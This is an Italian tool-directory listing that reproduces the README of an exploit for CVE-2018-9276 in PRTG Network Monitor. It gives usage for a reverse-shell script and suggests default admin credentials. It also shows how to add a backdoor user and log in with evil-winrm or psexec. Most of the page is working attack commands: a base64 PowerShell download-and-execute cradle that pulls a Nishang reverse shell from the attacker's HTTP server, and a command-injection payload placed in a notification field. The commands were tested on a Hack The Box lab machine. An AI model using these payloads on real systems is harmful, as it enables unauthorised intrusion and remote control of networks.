Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-9276 — CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (supporto Python3) | Kitploit
Strumenti/GitHubGitHub/alvinsmith-eroad/cve-2018-9276
Generazione di PayloadExploitMovimento LateraleSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubalvinsmith-eroad/cve-2018-9276

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (supporto Python3)

Vedi Repository
245 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (supporto Python3)

Dipendenze

  • Impacket (versione python3)
  • Netcat
  • Msfvenom

Utilizzo

root@kitploit:~
git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
  1. Le credenziali sono necessarie per eseguire l'exploit. Prova le credenziali predefinite prtgadmin:prtgadmin. Potrebbe essere utile controllare il database o i log per ottenerle. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
  2. Prova --lport 445 se la porta non è occupata
  3. Ci sono alcuni commenti contorti nel codice. Potrebbero necessitare di alcune modifiche.
  4. Potrebbero essere necessari alcuni tentativi per avere successo. Riavviare la macchina di destinazione è sempre una buona opzione. Soprattutto quando il tuo payload causa qualche impatto.

Copertura test

HTB Netmon box

root@kitploit:~
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

Crediti

Un grande ringraziamento a wildkindcc per la versione python2 https://github.com/wildkindcc/CVE-2018-9276

Espandi conoscenza

Uso di metasploit

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

Esecuzione remota di codice

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

Esempio d'uso

Le credenziali sono necessarie per eseguire l'exploit. Prima accedi e ottieni il cookie autenticato per aggiungere un nuovo utente.

root@kitploit:~
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or alternative psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10

Screen Shot 2021-07-29 at 3 14 10 PM

Exploit manuale avanzato senza aggiungere un nuovo utente

Crediti appartengono alla writeup ufficiale di HTB
POC: https://www.codewatch.org/blog/?p=453 Più uso di SMB per ottenere una reverse shell https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB

Nel caso non volessimo aggiungere un utente, per una migliore OPSEC possiamo ottenere una reverse shell. Tuttavia, a causa della codifica HTML molti caratteri vengono codificati. Possiamo bypassare questo usando l'esecuzione powershell in base64. Dobbiamo creare un comando codificato in base64. Tuttavia, deve essere nella codifica utilizzata da Windows, cioè UTF-16LE

root@kitploit:~
❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

Usiamo iconv per convertirlo nella codifica di destinazione ed eseguiremo questa reverse shell da Nishang. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Scarica lo script e aggiungi il comando con echo all'ultima riga.

root@kitploit:~
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1

Ora avvia un semplice server HTTP e crea una nuova notifica

root@kitploit:~
python3 -m http.server 80

Clicca su Setup > Account Settings > Notifications -> clicca su “Add new notification” all'estrema destra Attiva la notifica cliccando sul pulsante a campana

root@kitploit:~
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

Screen Shot 2021-07-29 at 4 08 01 PM

Scarica lo strumento